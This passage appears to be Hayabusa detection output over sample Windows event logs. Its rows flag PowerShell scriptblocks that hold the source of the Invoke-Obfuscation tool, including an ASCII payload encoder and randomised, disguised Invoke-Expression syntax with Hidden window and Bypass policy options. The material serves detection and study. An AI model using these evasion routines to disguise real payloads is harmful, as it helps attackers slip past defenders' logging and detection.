-ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation.
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. 
$RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. 
Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
$DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. 
$Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
